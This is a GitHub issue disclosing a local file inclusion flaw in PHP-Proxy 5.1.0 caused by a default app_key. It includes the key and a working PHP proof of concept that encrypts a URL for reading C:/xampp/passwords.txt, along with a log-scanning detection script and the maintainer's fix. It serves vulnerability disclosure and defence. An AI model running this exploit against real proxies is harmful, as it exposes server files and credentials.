
PHP-Proxy 5.1.0 - Local File Inclusion (LFI) Vulnerability (on default pre-installed version) #134

Closed
ameerpornillos opened this Issue Nov 13, 2018 · 2 comments


ameerpornillos commented Nov 13, 2018

Brief description of this vulnerability:

The downloadable pre-installed version of PHP-Proxy 5.1.0 (current as of this posting day) from www.php-proxy.com (https://www.php-proxy.com/download/php-proxy.zip) makes use of a default app_key, which can be used for local file inclusion attacks. This can be used to generate an encrypted string which can gain access to arbitrary local files on the server. (example: http://php-proxy-site/php-proxy/index.php?q=<encrypted_string_value>)

Affected Version:

5.1.0 (pre-installed version)

Reason of this vulnerability:

The downloadable pre-installed version of PHP-Proxy 5.1.0 (current pre-installed version as of this posting day) from www.php-proxy.com (https://www.php-proxy.com/download/php-proxy.zip) already contains the default app_key in the config.php file, which might be used by several users of the application and is thus vulnerable to local file inclusion.

//default app_key from config.php file
$config['app_key'] = 'aeb067ca0aa9a3193dce3a7264c90187';

The encrypted URL value relies on the app_key, as seen in the snippet of code below.

//encryption function of the application
$url = str_rot_pass($url, $key);

Here the key is the encryption_key, and by default its value depends on the md5 hash of the app_key and the visiting IP address.

//with the default url_mode (2), encryption_key is the md5 hash of the app_key concatenated with the visitor's IP address
Config::set('encryption_key', md5(Config::get('app_key').$_SERVER['REMOTE_ADDR']));

Combining all the functions above, an encrypted URL can be generated which contains the local file inclusion vulnerability payload.

Proof of Concept:

The code below will output an encrypted string which can exploit the local file inclusion vulnerability. Add the encrypted string to the PHP-Proxy 5.1.0 application URL, for example: http://192.168.0.130/php-proxy/index.php?q=<encrypted_string_value> (replace <encrypted_string_value> with the generated encrypted string value)

<?php
$file = "file:///C:/xampp/passwords.txt"; //example target file to read
$ip = "192.168.0.1"; //change depending on your IP address that access the app
$app_key = "aeb067ca0aa9a3193dce3a7264c90187";
$key = md5($app_key.$ip);
function str_rot_pass($str, $key, $decrypt = false){
    $key_len = strlen($key);
    $result = str_repeat(' ', strlen($str));
    for($i=0; $i<strlen($str); $i++){
        if($decrypt){
            $ascii = ord($str[$i]) - ord($key[$i % $key_len]);
        } else {
            $ascii = ord($str[$i]) + ord($key[$i % $key_len]);
        }
        $result[$i] = chr($ascii);
    }
    return $result;
}
function base64_url_encode($input){
    return rtrim(strtr(base64_encode($input), '+/', '-_'), '=');
}
echo base64_url_encode(str_rot_pass($file, $key));
?>

The screenshot below is an example of obtaining an encrypted URL string, which is then used to read C:/xampp/passwords.txt on the server.

[screenshot: php-proxy-5.1.0-lfi-vulnerability]

Impact:

Gain access to arbitrary local files on the server.

Suggested Mitigation:

There is already a setup.txt included in the downloadable pre-installed version of PHP-Proxy which will generate and overwrite the default app_key; however, users most probably don't use it and keep on using the default app_key.

A possible mitigation is to make the app_key value in config.php blank and have users use setup.txt to generate and overwrite the default app_key.
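Because the shipped app_key and the key derivation (md5 of app_key plus visitor IP) are both known, an operator of an affected install can decode the q= values in their own access log and find requests that point the proxy at file:// paths. The script below is an added example for that audit, not code from the issue or from PHP-Proxy; it ports str_rot_pass() and the URL-safe base64 step from the report, assumes a combined-style access log, and the log lines it scans are constructed here.

```python
import base64
import hashlib
import re
from urllib.parse import urlsplit

# Default app_key shipped in config.php of the pre-installed PHP-Proxy 5.1.0 (quoted in the report)
DEFAULT_APP_KEY = "aeb067ca0aa9a3193dce3a7264c90187"

def encryption_key(app_key, remote_addr):
    # url_mode 2: encryption_key = md5(app_key . $_SERVER['REMOTE_ADDR'])
    return hashlib.md5((app_key + remote_addr).encode()).hexdigest()

def str_rot_pass(data, key, decrypt=False):
    # Port of the proxy's str_rot_pass(): add (or subtract) key bytes, wrapping like PHP chr()
    kb, sign = key.encode(), (-1 if decrypt else 1)
    return bytes((b + sign * kb[i % len(kb)]) % 256 for i, b in enumerate(data))

def decode_q(q, remote_addr, app_key=DEFAULT_APP_KEY):
    # Recover the proxied URL behind a q= value; possible only because app_key is known.
    # Undo base64_url_encode() first: restore '+', '/' and the stripped '=' padding.
    raw = base64.b64decode(q.replace("-", "+").replace("_", "/") + "=" * (-len(q) % 4))
    return str_rot_pass(raw, encryption_key(app_key, remote_addr), decrypt=True).decode("latin-1")

def make_q(url, remote_addr, app_key=DEFAULT_APP_KEY):
    # Forward direction (as in the PoC); used here only to build the constructed sample log
    enc = str_rot_pass(url.encode("latin-1"), encryption_key(app_key, remote_addr))
    return base64.urlsafe_b64encode(enc).decode().rstrip("=")

LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]*\] "GET [^?"]*\?q=([A-Za-z0-9_-]+)')

def scan_log(lines, app_key=DEFAULT_APP_KEY, allowed=("http", "https")):
    # Return (ip, decoded_url) for proxied requests whose scheme is not http/https,
    # i.e. file:// reads of the local filesystem as described in the report
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        ip, q = m.group(1), m.group(2)
        try:
            url = decode_q(q, ip, app_key)
            scheme = urlsplit(url).scheme.lower()
        except ValueError:  # not valid base64, or a URL that urlsplit rejects
            continue
        if scheme not in allowed:
            hits.append((ip, url))
    return hits

# Constructed sample access-log lines (not real traffic): one benign page, one file:// read
LINE = '192.168.0.1 - - [13/Nov/2018:10:00:%02d +0000] "GET /php-proxy/index.php?q=%s HTTP/1.1" 200 %d'
SAMPLE_LOG = [LINE % (0, make_q("http://example.com/", "192.168.0.1"), 512),
              LINE % (5, make_q("file:///C:/xampp/passwords.txt", "192.168.0.1"), 77)]
```

Once the app_key has been regenerated, the same scan with the old default key stops decoding anything meaningful, which is a quick way to confirm the rotation took effect.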


Benji-Collins commented Nov 13, 2018

Thanks for pointing this out. There are probably quite a few installs affected by this.

Another possible fix is to leave the app_key value blank and make the proxy throw an error (and not search) if it is not changed (in the same style that other search related errors are shown, above the URL bar).

Athlon1600 (Owner) commented Dec 15, 2018

Fixed.
A preinstalled version of php-proxy that exists here:

https://www.php-proxy.com/download/php-proxy.zip

will no longer include an app_key by default; it will have to be generated manually by the user, or else they get:

app_key inside config.php cannot be empty!

@Athlon1600 Athlon1600 closed this Dec 15, 2018
